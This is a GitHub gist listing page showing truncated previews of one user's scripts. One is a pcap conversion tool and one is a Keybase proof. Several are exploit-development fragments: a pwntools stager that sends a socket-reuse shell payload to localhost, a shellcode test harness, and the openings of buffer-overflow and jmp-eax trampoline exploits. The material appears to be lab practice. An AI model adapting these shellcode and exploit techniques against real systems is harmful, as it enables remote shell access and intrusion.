Robert Larsen RobertLarsen
@RobertLarsen
RobertLarsen / base64_to_pcap.py
Created September 9, 2015 08:36
Turn a packet captured by Suricata and stored in base64 into a pcap
#!/usr/bin/env python2
import base64, struct, sys
if len(sys.argv) > 1:
    try:
        binary = base64.decodestring(sys.argv[1])
        # File header
        sys.stdout.write(struct.pack("IHHIIII",
            0xa1b2c3d4, # Magic

Keybase proof

I hereby claim:

  • I am robertlarsen on github.
  • I am robertlarsen (https://keybase.io/robertlarsen) on keybase.
  • I have a public key whose fingerprint is 14BE F756 4092 1FC9 C8E6 1806 CC33 1E8A C16A 1996

To claim this, I am signing this object:

@RobertLarsen
RobertLarsen / test.py
Created March 20, 2015 13:42
Testing stager shellcode
#!/usr/bin/env python2
from pwn import *
from time import sleep
context(arch = 'amd64', os = 'linux')
r = remote('localhost', 8888)
payload = asm(shellcraft.findpeersh())
stager = asm(shellcraft.findpeer() + shellcraft.stager('rdi', len(payload)))
@RobertLarsen
RobertLarsen / run_shellcode.c
Created March 20, 2015 12:58
Program for testing shellcode
#include <fcntl.h>
#include <netinet/in.h>
#include <signal.h>
#include <stdio.h>
#include <sys/mman.h>
#include <sys/socket.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>
@RobertLarsen
RobertLarsen / trampoline_sploit.py
Created December 1, 2014 07:48
trampoline_sploit.py
#!/usr/bin/python
from pwn import *
import sys
context(os='linux', arch='i386')
jmp_eax=0x08048bf7
host = 'localhost'
port = 9988
@RobertLarsen
RobertLarsen / bufferoverflow_sploit.py
Created December 1, 2014 07:47
bufferoverflow_sploit.py
#!/usr/bin/python
from pwn import *
import sys
context(os='linux', arch='i386')
host = 'localhost'
port = 9988
if len(sys.argv) > 1: